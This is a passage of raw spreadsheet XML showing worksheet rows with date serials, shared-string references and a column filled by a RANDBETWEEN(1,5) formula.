        <v>13</v>
      </c>
      <c r="C4454" t="s">
        <v>10</v>
      </c>
      <c r="E4454" s="2" t="s">
        <v>4263</v>
      </c>
      <c r="F4454">
        <f t="shared" ca="1" si="69"/>
        <v>4</v>
      </c>
    </row>
    <row r="4455" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4455" s="1">
        <v>43475.351111111115</v>
      </c>
      <c r="B4455" t="s">
        <v>19</v>
      </c>
      <c r="C4455" t="s">
        <v>10</v>
      </c>
      <c r="D4455" t="s">
        <v>14</v>
      </c>
      <c r="E4455" t="s">
        <v>4264</v>
      </c>
      <c r="F4455">
        <f t="shared" ca="1" si="69"/>
        <v>5</v>
      </c>
    </row>
    <row r="4456" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4456" s="1">
        <v>43475.328136574077</v>
      </c>
      <c r="B4456" t="s">
        <v>13</v>
      </c>
      <c r="C4456" t="s">
        <v>41</v>
      </c>
      <c r="E4456" t="s">
        <v>4265</v>
      </c>
      <c r="F4456">
        <f t="shared" ca="1" si="69"/>
        <v>4</v>
      </c>
    </row>
    <row r="4457" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4457" s="1">
        <v>43475.318703703706</v>
      </c>
      <c r="B4457" t="s">
        <v>19</v>
      </c>
      <c r="C4457" t="s">
        <v>63</v>
      </c>
      <c r="E4457" t="s">
        <v>4266</v>
      </c>
      <c r="F4457">
        <f t="shared" ca="1" si="69"/>
        <v>5</v>
      </c>
    </row>
    <row r="4458" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4458" s="1">
        <v>43475.30369212963</v>
      </c>
      <c r="B4458" t="s">
        <v>13</v>
      </c>
      <c r="C4458" t="s">
        <v>10</v>
      </c>
      <c r="D4458" t="s">
        <v>192</v>
      </c>
      <c r="E4458" t="s">
        <v>4267</v>
      </c>
      <c r="F4458">
        <f t="shared" ca="1" si="69"/>
        <v>5</v>
      </c>
    </row>
    <row r="4459" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4459" s="1">
        <v>43475.300300925926</v>
      </c>
      <c r="B4459" t="s">
        <v>5</v>
      </c>
      <c r="C4459" t="s">
        <v>41</v>
      </c>
      <c r="E4459" s="2" t="s">
        <v>4268</v>
      </c>
      <c r="F4459">
        <f t="shared" ca="1" si="69"/>
        <v>5</v>
      </c>
    </row>
    <row r="4460" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4460" s="1">
        <v>43475.285902777781</v>
      </c>
      <c r="B4460" t="s">
        <v>19</v>
      </c>
      <c r="C4460" t="s">
        <v>48</v>
      </c>
      <c r="E4460" t="s">
        <v>4269</v>
      </c>
      <c r="F4460">
        <f t="shared" ca="1" si="69"/>
        <v>3</v>
      </c>
    </row>
    <row r="4461" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4461" s="1">
        <v>43475.282604166663</v>
      </c>
      <c r="B4461" t="s">
        <v>13</v>
      </c>
      <c r="C4461" t="s">
        <v>41</v>
      </c>
      <c r="E4461" t="s">
        <v>4270</v>
      </c>
      <c r="F4461">
        <f t="shared" ca="1" si="69"/>
        <v>4</v>
      </c>
    </row>
    <row r="4462" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4462" s="1">
        <v>43475.266643518517</v>
      </c>
      <c r="B4462" t="s">
        <v>5</v>
      </c>
      <c r="C4462" t="s">
        <v>63</v>
      </c>
      <c r="E4462" s="2" t="s">
        <v>4271</v>
      </c>
      <c r="F4462">
        <f t="shared" ca="1" si="69"/>
        <v>5</v>
      </c>
    </row>
    <row r="4463" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4463" s="1">
        <v>43475.259675925925</v>
      </c>
      <c r="B4463" t="s">
        <v>5</v>
      </c>
      <c r="C4463" t="s">
        <v>48</v>
      </c>
      <c r="E4463" s="2" t="s">
        <v>4272</v>
      </c>
      <c r="F4463">
        <f t="shared" ca="1" si="69"/>
        <v>2</v>
      </c>
    </row>
    <row r="4464" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4464" s="1">
        <v>43475.256064814814</v>
      </c>
      <c r="B4464" t="s">
        <v>1305</v>
      </c>
      <c r="C4464" t="s">
        <v>41</v>
      </c>
      <c r="E4464" t="s">
        <v>4273</v>
      </c>
      <c r="F4464">
        <f t="shared" ca="1" si="69"/>
        <v>3</v>
      </c>
    </row>
    <row r="4465" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4465" s="1">
        <v>43475.255462962959</v>
      </c>
      <c r="B4465" t="s">
        <v>13</v>
      </c>
      <c r="C4465" t="s">
        <v>461</v>
      </c>
      <c r="E4465" t="s">
        <v>4274</v>
      </c>
      <c r="F4465">
        <f t="shared" ca="1" si="69"/>
        <v>2</v>
      </c>
    </row>
    <row r="4466" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4466" s="1">
        <v>43475.250717592593</v>
      </c>
      <c r="B4466" t="s">
        <v>5</v>
      </c>
      <c r="C4466" t="s">
        <v>29</v>
      </c>
      <c r="E4466" t="s">
        <v>4275</v>
      </c>
      <c r="F4466">
        <f t="shared" ca="1" si="69"/>
        <v>2</v>
      </c>
    </row>
    <row r="4467" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4467" s="1">
        <v>43475.247094907405</v>
      </c>
      <c r="B4467" t="s">
        <v>5</v>
      </c>
      <c r="C4467" t="s">
        <v>4276</v>
      </c>
      <c r="D4467" t="s">
        <v>367</v>
      </c>
      <c r="E4467" t="s">
        <v>4277</v>
      </c>
      <c r="F4467">
        <f t="shared" ca="1" si="69"/>
        <v>2</v>
      </c>
    </row>
    <row r="4468" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4468" s="1">
        <v>43475.239745370367</v>
      </c>
      <c r="B4468" t="s">
        <v>19</v>
      </c>
      <c r="C4468" t="s">
        <v>10</v>
      </c>
      <c r="D4468" t="s">
        <v>290</v>
      </c>
      <c r="E4468" t="s">
        <v>4279</v>
      </c>
      <c r="F4468">
        <f t="shared" ca="1" si="69"/>
        <v>3</v>
      </c>
    </row>
    <row r="4469" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4469" s="1">
        <v>43475.237314814818</v>
      </c>
      <c r="B4469" t="s">
        <v>13</v>
      </c>
      <c r="C4469" t="s">
        <v>48</v>
      </c>
      <c r="E4469" t="s">
        <v>4280</v>
      </c>
      <c r="F4469">
        <f t="shared" ca="1" si="69"/>
        <v>5</v>
      </c>
    </row>
    <row r="4470" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4470" s="1">
        <v>43475.225486111114</v>
      </c>
      <c r="B4470" t="s">
        <v>5</v>
      </c>
      <c r="C4470" t="s">
        <v>71</v>
      </c>
      <c r="E4470" s="2" t="s">
        <v>4281</v>
      </c>
      <c r="F4470">
        <f t="shared" ca="1" si="69"/>
        <v>2</v>
      </c>
    </row>
    <row r="4471" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4471" s="1">
        <v>43475.225439814814</v>
      </c>
      <c r="B4471" t="s">
        <v>5</v>
      </c>
      <c r="C4471" t="s">
        <v>71</v>
      </c>
      <c r="E4471" s="2" t="s">
        <v>4281</v>
      </c>
      <c r="F4471">
        <f t="shared" ca="1" si="69"/>
        <v>1</v>
      </c>
    </row>
    <row r="4472" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A4472" s="1">
        <v>43475.216493055559</v>
      </c>
      <c r="B4472" t="s">
        <v>19</v>
      </c>
      <c r="C4472" t="s">
        <v>65</v>
      </c>
      <c r="E4472" s="2" t="s">
        <v>4282</v>
      </c>
      <c r="F4472">
        <f t="shared" ca="1" si="69"/>
        <v>3</v>
      </c>
    </row>
    <row r="4473" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4473" s="1">
        <v>43475.207499999997</v>
      </c>
      <c r="B4473" t="s">
        <v>19</v>
      </c>
      <c r="C4473" t="s">
        <v>41</v>
      </c>
      <c r="E4473" t="s">
        <v>4283</v>
      </c>
      <c r="F4473">
        <f t="shared" ca="1" si="69"/>
        <v>4</v>
      </c>
    </row>
    <row r="4474" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A4474" s="1">
        <v>43475.203784722224</v>
      </c>
      <c r="B4474" t="s">
        <v>19</v>
      </c>
      <c r="C4474" t="s">
        <v>48</v>
      </c>
      <c r="E4474" s="2" t="s">
        <v>4284</v>
      </c>
      <c r="F4474">
        <f t="shared" ca="1" si="69"/>
        <v>3</v>
      </c>
    </row>
    <row r="4475" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4475" s="1">
        <v>43475.169768518521</v>
      </c>
      <c r="B4475" t="s">
        <v>5</v>
      </c>
      <c r="C4475" t="s">
        <v>65</v>
      </c>
      <c r="E4475" s="2" t="s">
        <v>4285</v>
      </c>
      <c r="F4475">
        <f t="shared" ca="1" si="69"/>
        <v>4</v>
      </c>
    </row>
    <row r="4476" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A4476" s="1">
        <v>43475.149259259262</v>
      </c>
      <c r="B4476" t="s">
        <v>13</v>
      </c>
      <c r="C4476" t="s">
        <v>73</v>
      </c>
      <c r="E4476" s="2" t="s">
        <v>4286</v>
      </c>
      <c r="F4476">
        <f t="shared" ca="1" si="69"/>
        <v>4</v>
      </c>
    </row>
    <row r="4477" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4477" s="1">
        <v>43475.129282407404</v>
      </c>
      <c r="B4477" t="s">
        <v>13</v>
      </c>
      <c r="C4477" t="s">
        <v>776</v>
      </c>
      <c r="E4477" s="2" t="s">
        <v>4287</v>
      </c>
      <c r="F4477">
        <f t="shared" ca="1" si="69"/>
        <v>1</v>
      </c>
    </row>
    <row r="4478" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4478" s="1">
        <v>43475.127256944441</v>
      </c>
      <c r="B4478" t="s">
        <v>5</v>
      </c>
      <c r="C4478" t="s">
        <v>430</v>
      </c>
      <c r="E4478" s="2" t="s">
        <v>4288</v>
      </c>
      <c r="F4478">
        <f t="shared" ca="1" si="69"/>
        <v>2</v>
      </c>
    </row>
    <row r="4479" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4479" s="1">
        <v>43475.085949074077</v>
      </c>
      <c r="B4479" t="s">
        <v>13</v>
      </c>
      <c r="C4479" t="s">
        <v>301</v>
      </c>
      <c r="E4479" s="2" t="s">
        <v>4289</v>
      </c>
      <c r="F4479">
        <f t="shared" ca="1" si="69"/>
        <v>3</v>
      </c>
    </row>
    <row r="4480" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4480" s="1">
        <v>43475.044849537036</v>
      </c>
      <c r="B4480" t="s">
        <v>19</v>
      </c>
      <c r="C4480" t="s">
        <v>454</v>
      </c>
      <c r="E4480" s="2" t="s">
        <v>4290</v>
      </c>
      <c r="F4480">
        <f t="shared" ca="1" si="69"/>
        <v>3</v>
      </c>
    </row>
    <row r="4481" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4481" s="1">
        <v>43474.993321759262</v>
      </c>
      <c r="B4481" t="s">
        <v>19</v>
      </c>
      <c r="C4481" t="s">
        <v>408</v>
      </c>
      <c r="E4481" s="2" t="s">
        <v>4291</v>
      </c>
      <c r="F4481">
        <f t="shared" ca="1" si="69"/>
        <v>2</v>
      </c>
    </row>
    <row r="4482" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4482" s="1">
        <v>43474.846377314818</v>
      </c>
      <c r="B4482" t="s">
        <v>1305</v>
      </c>
      <c r="C4482" t="s">
        <v>408</v>
      </c>
      <c r="E4482" s="2" t="s">
        <v>4292</v>
      </c>
      <c r="F4482">
        <f t="shared" ref="F4482:F4545" ca="1" si="70">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="4483" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4483" s="1">
        <v>43474.816435185188</v>
      </c>
      <c r="B4483" t="s">
        <v>13</v>
      </c>
      <c r="C4483" t="s">
        <v>260</v>
      </c>
      <c r="E4483" s="2" t="s">
        <v>4293</v>
      </c>
      <c r="F4483">
        <f t="shared" ca="1" si="70"/>
        <v>1</v>
      </c>
    </row>
    <row r="4484" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A4484" s="1">
        <v>43474.774212962962</v>
      </c>
      <c r="B4484" t="s">
        <v>5</v>
      </c>
      <c r="C4484" t="s">
        <v>6</v>
      </c>
      <c r="D4484" t="s">
        <v>194</v>
      </c>
      <c r="E4484" s="2" t="s">
        <v>4294</v>
      </c>
      <c r="F4484">
        <f t="shared" ca="1" si="70"/>
        <v>1</v>
      </c>
    </row>
    <row r="4485" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4485" s="1">
        <v>43474.765706018516</v>
      </c>
      <c r="B4485" t="s">
        <v>19</v>
      </c>
      <c r="C4485" t="s">
        <v>10</v>
      </c>
      <c r="D4485" t="s">
        <v>6</v>
      </c>
      <c r="E4485" t="s">
        <v>4295</v>
      </c>
      <c r="F4485">
        <f t="shared" ca="1" si="70"/>
        <v>5</v>
      </c>
    </row>
    <row r="4486" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A4486" s="1">
        <v>43474.737175925926</v>
      </c>
      <c r="B4486" t="s">
        <v>35</v>
      </c>
      <c r="C4486" t="s">
        <v>10</v>
      </c>
      <c r="D4486" t="s">
        <v>80</v>
      </c>
      <c r="E4486" s="2" t="s">
        <v>4296</v>
      </c>
      <c r="F4486">
        <f t="shared" ca="1" si="70"/>
        <v>3</v>
      </c>
    </row>
    <row r="4487" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4487" s="1">
        <v>43474.714768518519</v>
      </c>
      <c r="B4487" t="s">
        <v>35</v>
      </c>
      <c r="C4487" t="s">
        <v>10</v>
      </c>
      <c r="D4487" t="s">
        <v>80</v>
      </c>
      <c r="E4487" s="2" t="s">
        <v>4297</v>
      </c>
      <c r="F4487">
        <f t="shared" ca="1" si="70"/>
        <v>2</v>
      </c>
    </row>
    <row r="4488" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4488" s="1">
        <v>43474.714236111111</v>
      </c>
      <c r="B4488" t="s">
        <v>13</v>
      </c>
      <c r="C4488" t="s">
        <v>10</v>
      </c>
      <c r="D4488" t="s">
        <v>163</v>
      </c>
      <c r="E4488" t="s">
        <v>4298</v>
      </c>
      <c r="F4488">
        <f t="shared" ca="1" si="70"/>
        <v>2</v>
      </c>
    </row>
    <row r="4489" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4489" s="1">
        <v>43474.688750000001</v>
      </c>
      <c r="B4489" t="s">
        <v>19</v>
      </c>
      <c r="C4489" t="s">
        <v>344</v>
      </c>
      <c r="E4489" s="2" t="s">
        <v>4299</v>
      </c>
      <c r="F4489">
        <f t="shared" ca="1" si="70"/>
        <v>1</v>
      </c>
    </row>
    <row r="4490" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4490" s="1">
        <v>43474.680451388886</v>
      </c>
      <c r="B4490" t="s">
        <v>19</v>
      </c>
      <c r="C4490" t="s">
        <v>10</v>
      </c>
      <c r="D4490" t="s">
        <v>86</v>
      </c>
      <c r="E4490" t="s">
        <v>4300</v>
      </c>
      <c r="F4490">
        <f t="shared" ca="1" si="70"/>
        <v>2</v>
      </c>
    </row>
    <row r="4491" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4491" s="1">
        <v>43474.667430555557</v>
      </c>
      <c r="B4491" t="s">
        <v>5</v>
      </c>
      <c r="C4491" t="s">
        <v>6</v>
      </c>
      <c r="D4491" t="s">
        <v>25</v>
      </c>
      <c r="E4491" t="s">
        <v>4301</v>
      </c>
      <c r="F4491">
        <f t="shared" ca="1" si="70"/>
        <v>2</v>
      </c>
    </row>
    <row r="4492" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A4492" s="1">
        <v>43474.654618055552</v>
      </c>
      <c r="B4492" t="s">
        <v>19</v>
      </c>
      <c r="C4492" t="s">
        <v>10</v>
      </c>
      <c r="D4492" t="s">
        <v>52</v>
      </c>
      <c r="E4492" s="2" t="s">
        <v>4302</v>
      </c>
      <c r="F4492">
        <f t="shared" ca="1" si="70"/>
        <v>1</v>
      </c>
    </row>
    <row r="4493" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4493" s="1">
        <v>43474.651875000003</v>
      </c>
      <c r="B4493" t="s">
        <v>5</v>
      </c>
      <c r="C4493" t="s">
        <v>6</v>
      </c>
      <c r="D4493" t="s">
        <v>2214</v>
      </c>
      <c r="E4493" t="s">
        <v>4303</v>
      </c>
      <c r="F4493">
        <f t="shared" ca="1" si="70"/>
        <v>2</v>
      </c>
    </row>
    <row r="4494" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4494" s="1">
        <v>43474.647997685184</v>
      </c>
      <c r="B4494" t="s">
        <v>19</v>
      </c>
      <c r="C4494" t="s">
        <v>10</v>
      </c>
      <c r="D4494" t="s">
        <v>17</v>
      </c>
      <c r="E4494" t="s">
        <v>4304</v>
      </c>
      <c r="F4494">
        <f t="shared" ca="1" si="70"/>
        <v>1</v>
      </c>
    </row>
    <row r="4495" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4495" s="1">
        <v>43474.628460648149</v>
      </c>
      <c r="B4495" t="s">
        <v>1305</v>
      </c>
      <c r="C4495" t="s">
        <v>60</v>
      </c>
      <c r="E4495" t="s">
        <v>4305</v>
      </c>
      <c r="F4495">
        <f t="shared" ca="1" si="70"/>
        <v>1</v>
      </c>
    </row>
    <row r="4496" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4496" s="1">
        <v>43474.628425925926</v>
      </c>
      <c r="B4496" t="s">
        <v>13</v>
      </c>
      <c r="C4496" t="s">
        <v>10</v>
      </c>
      <c r="D4496" t="s">
        <v>163</v>
      </c>
      <c r="E4496" t="s">
        <v>4306</v>
      </c>
      <c r="F4496">
        <f t="shared" ca="1" si="70"/>
        <v>4</v>
      </c>
    </row>
    <row r="4497" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4497" s="1">
        <v>43474.622048611112</v>
      </c>
      <c r="B4497" t="s">
        <v>5</v>
      </c>
      <c r="C4497" t="s">
        <v>6</v>
      </c>
      <c r="D4497" t="s">
        <v>25</v>
      </c>
      <c r="E4497" t="s">
        <v>4307</v>
      </c>
      <c r="F4497">
        <f t="shared" ca="1" si="70"/>
        <v>4</v>
      </c>
    </row>
    <row r="4498" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4498" s="1">
        <v>43474.619930555556</v>
      </c>
      <c r="B4498" t="s">
        <v>19</v>
      </c>
      <c r="C4498" t="s">
        <v>10</v>
      </c>
      <c r="D4498" t="s">
        <v>192</v>
      </c>
      <c r="E4498" t="s">
        <v>4308</v>
      </c>
      <c r="F4498">
        <f t="shared" ca="1" si="70"/>
        <v>1</v>
      </c>
    </row>
    <row r="4499" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4499" s="1">
        <v>43474.594189814816</v>
      </c>
      <c r="B4499" t="s">
        <v>19</v>
      </c>
      <c r="C4499" t="s">
        <v>10</v>
      </c>
      <c r="D4499" t="s">
        <v>33</v>
      </c>
      <c r="E4499" s="2" t="s">
        <v>4309</v>
      </c>
      <c r="F4499">
        <f t="shared" ca="1" si="70"/>
        <v>5</v>
      </c>
    </row>
    <row r="4500" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A4500" s="1">
        <v>43474.572500000002</v>
      </c>
      <c r="B4500" t="s">
        <v>13</v>
      </c>
      <c r="C4500" t="s">
        <v>10</v>
      </c>
      <c r="D4500" t="s">
        <v>192</v>
      </c>
      <c r="E4500" s="2" t="s">
        <v>4310</v>
      </c>
      <c r="F4500">
        <f t="shared" ca="1" si="70"/>
        <v>5</v>
      </c>
    </row>
    <row r="4501" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A4501" s="1">
        <v>43474.567349537036</v>
      </c>
      <c r="B4501" t="s">
        <v>1305</v>
      </c>
      <c r="C4501" t="s">
        <v>6</v>
      </c>
      <c r="D4501" t="s">
        <v>194</v>
      </c>
      <c r="E4501" s="2" t="s">
        <v>4311</v>
      </c>
      <c r="F4501">
        <f t="shared" ca="1" si="70"/>
        <v>5</v>
      </c>
    </row>
    <row r="4502" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4502" s="1">
        <v>43474.558252314811</v>
      </c>
      <c r="B4502" t="s">
        <v>5</v>
      </c>
      <c r="C4502" t="s">
        <v>6</v>
      </c>
      <c r="D4502" t="s">
        <v>25</v>
      </c>
      <c r="F4502">
        <f t="shared" ca="1" si="70"/>
        <v>4</v>
      </c>
    </row>
    <row r="4503" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4503" s="1">
        <v>43474.55746527778</v>
      </c>
      <c r="B4503" t="s">
        <v>19</v>
      </c>
      <c r="C4503" t="s">
        <v>1077</v>
      </c>
      <c r="E4503" t="s">
        <v>4312</v>
      </c>
      <c r="F4503">
        <f t="shared" ca="1" si="70"/>
        <v>1</v>
      </c>
    </row>
    <row r="4504" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4504" s="1">
        <v>43474.555578703701</v>
      </c>
      <c r="B4504" t="s">
        <v>35</v>
      </c>
      <c r="C4504" t="s">
        <v>10</v>
      </c>
      <c r="D4504" t="s">
        <v>6</v>
      </c>
      <c r="E4504" s="2" t="s">
        <v>4313</v>
      </c>
      <c r="F4504">
        <f t="shared" ca="1" si="70"/>
        <v>4</v>
      </c>
    </row>
    <row r="4505" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4505" s="1">
        <v>43474.543622685182</v>
      </c>
      <c r="B4505" t="s">
        <v>13</v>
      </c>
      <c r="C4505" t="s">
        <v>10</v>
      </c>
      <c r="D4505" t="s">
        <v>163</v>
      </c>
      <c r="E4505" t="s">
        <v>4314</v>
      </c>
      <c r="F4505">
        <f t="shared" ca="1" si="70"/>
        <v>1</v>
      </c>
    </row>
    <row r="4506" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4506" s="1">
        <v>43474.538703703707</v>
      </c>
      <c r="B4506" t="s">
        <v>19</v>
      </c>
      <c r="C4506" t="s">
        <v>10</v>
      </c>
      <c r="D4506" t="s">
        <v>11</v>
      </c>
      <c r="E4506" t="s">
        <v>4315</v>
      </c>
      <c r="F4506">
        <f t="shared" ca="1" si="70"/>
        <v>2</v>
      </c>
    </row>
    <row r="4507" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4507" s="1">
        <v>43474.499340277776</v>
      </c>
      <c r="B4507" t="s">
        <v>19</v>
      </c>
      <c r="C4507" t="s">
        <v>41</v>
      </c>
      <c r="E4507" t="s">
        <v>4316</v>
      </c>
      <c r="F4507">
        <f t="shared" ca="1" si="70"/>
        <v>2</v>
      </c>
    </row>
    <row r="4508" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4508" s="1">
        <v>43474.493518518517</v>
      </c>
      <c r="B4508" t="s">
        <v>5</v>
      </c>
      <c r="C4508" t="s">
        <v>6</v>
      </c>
      <c r="D4508" t="s">
        <v>25</v>
      </c>
      <c r="E4508" t="s">
        <v>4317</v>
      </c>
      <c r="F4508">
        <f t="shared" ca="1" si="70"/>
        <v>4</v>
      </c>
    </row>
    <row r="4509" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4509" s="1">
        <v>43474.491249999999</v>
      </c>
      <c r="B4509" t="s">
        <v>19</v>
      </c>
      <c r="C4509" t="s">
        <v>45</v>
      </c>
      <c r="E4509" s="2" t="s">
        <v>4318</v>
      </c>
      <c r="F4509">
        <f t="shared" ca="1" si="70"/>
        <v>5</v>
      </c>
    </row>
    <row r="4510" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4510" s="1">
        <v>43474.490671296298</v>
      </c>
      <c r="B4510" t="s">
        <v>5</v>
      </c>
      <c r="C4510" t="s">
        <v>10</v>
      </c>
      <c r="D4510" t="s">
        <v>23</v>
      </c>
      <c r="E4510" s="2" t="s">
        <v>4319</v>
      </c>
      <c r="F4510">
        <f t="shared" ca="1" si="70"/>
        <v>5</v>
      </c>
    </row>
    <row r="4511" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4511" s="1">
        <v>43474.486250000002</v>
      </c>
      <c r="B4511" t="s">
        <v>5</v>
      </c>
      <c r="C4511" t="s">
        <v>10</v>
      </c>
      <c r="D4511" t="s">
        <v>23</v>
      </c>
      <c r="E4511" t="s">
        <v>4320</v>
      </c>
      <c r="F4511">
        <f t="shared" ca="1" si="70"/>
        <v>1</v>
      </c>
    </row>
    <row r="4512" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4512" s="1">
        <v>43474.473587962966</v>
      </c>
      <c r="B4512" t="s">
        <v>2151</v>
      </c>
      <c r="C4512" t="s">
        <v>6</v>
      </c>
      <c r="D4512" t="s">
        <v>25</v>
      </c>
      <c r="E4512" t="s">
        <v>4321</v>
      </c>
      <c r="F4512">
        <f t="shared" ca="1" si="70"/>
        <v>1</v>
      </c>
    </row>
    <row r="4513" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4513" s="1">
        <v>43474.471562500003</v>
      </c>
      <c r="B4513" t="s">
        <v>13</v>
      </c>
      <c r="C4513" t="s">
        <v>124</v>
      </c>
      <c r="E4513" t="s">
        <v>4322</v>
      </c>
      <c r="F4513">
        <f t="shared" ca="1" si="70"/>
        <v>4</v>
      </c>
    </row>
    <row r="4514" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4514" s="1">
        <v>43474.471284722225</v>
      </c>
      <c r="B4514" t="s">
        <v>35</v>
      </c>
      <c r="C4514" t="s">
        <v>10</v>
      </c>
      <c r="D4514" t="s">
        <v>178</v>
      </c>
      <c r="E4514" s="2" t="s">
        <v>4323</v>
      </c>
      <c r="F4514">
        <f t="shared" ca="1" si="70"/>
        <v>1</v>
      </c>
    </row>
    <row r="4515" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4515" s="1">
        <v>43474.470393518517</v>
      </c>
      <c r="B4515" t="s">
        <v>5</v>
      </c>
      <c r="C4515" t="s">
        <v>260</v>
      </c>
      <c r="E4515" s="2" t="s">
        <v>4324</v>
      </c>
      <c r="F4515">
        <f t="shared" ca="1" si="70"/>
        <v>3</v>
      </c>
    </row>
    <row r="4516" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4516" s="1">
        <v>43474.460706018515</v>
      </c>
      <c r="B4516" t="s">
        <v>35</v>
      </c>
      <c r="C4516" t="s">
        <v>10</v>
      </c>
      <c r="D4516" t="s">
        <v>163</v>
      </c>
      <c r="E4516" t="s">
        <v>4325</v>
      </c>
      <c r="F4516">
        <f t="shared" ca="1" si="70"/>
        <v>5</v>
      </c>
    </row>
    <row r="4517" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4517" s="1">
        <v>43474.441203703704</v>
      </c>
      <c r="B4517" t="s">
        <v>13</v>
      </c>
      <c r="C4517" t="s">
        <v>124</v>
      </c>
      <c r="E4517" t="s">
        <v>4326</v>
      </c>
      <c r="F4517">
        <f t="shared" ca="1" si="70"/>
        <v>1</v>
      </c>
    </row>
    <row r="4518" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4518" s="1">
        <v>43474.440416666665</v>
      </c>
      <c r="B4518" t="s">
        <v>13</v>
      </c>
      <c r="C4518" t="s">
        <v>10</v>
      </c>
      <c r="D4518" t="s">
        <v>89</v>
      </c>
      <c r="E4518" s="2" t="s">
        <v>4327</v>
      </c>
      <c r="F4518">
        <f t="shared" ca="1" si="70"/>
        <v>4</v>
      </c>
    </row>
    <row r="4519" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4519" s="1">
        <v>43474.440081018518</v>
      </c>
      <c r="B4519" t="s">
        <v>19</v>
      </c>
      <c r="C4519" t="s">
        <v>103</v>
      </c>
      <c r="E4519" s="2" t="s">
        <v>4328</v>
      </c>
      <c r="F4519">
        <f t="shared" ca="1" si="70"/>
        <v>1</v>
      </c>
    </row>
    <row r="4520" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A4520" s="1">
        <v>43474.429930555554</v>
      </c>
      <c r="B4520" t="s">
        <v>13</v>
      </c>
      <c r="C4520" t="s">
        <v>124</v>
      </c>
      <c r="E4520" s="2" t="s">
        <v>4329</v>
      </c>
      <c r="F4520">
        <f t="shared" ca="1" si="70"/>
        <v>5</v>
      </c>
    </row>
    <row r="4521" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4521" s="1">
        <v>43474.41615740741</v>
      </c>
      <c r="B4521" t="s">
        <v>19</v>
      </c>
      <c r="C4521" t="s">
        <v>10</v>
      </c>
      <c r="D4521" t="s">
        <v>92</v>
      </c>
      <c r="E4521" s="2" t="s">
        <v>4330</v>
      </c>
      <c r="F4521">
        <f t="shared" ca="1" si="70"/>
        <v>5</v>
      </c>
    </row>
    <row r="4522" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4522" s="1">
        <v>43474.407627314817</v>
      </c>
      <c r="B4522" t="s">
        <v>5</v>
      </c>
      <c r="C4522" t="s">
        <v>127</v>
      </c>
      <c r="E4522" s="2" t="s">
        <v>4331</v>
      </c>
      <c r="F4522">
        <f t="shared" ca="1" si="70"/>
        <v>1</v>
      </c>
    </row>
    <row r="4523" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4523" s="1">
        <v>43474.405104166668</v>
      </c>
      <c r="B4523" t="s">
        <v>5</v>
      </c>
      <c r="C4523" t="s">
        <v>10</v>
      </c>
      <c r="D4523" t="s">
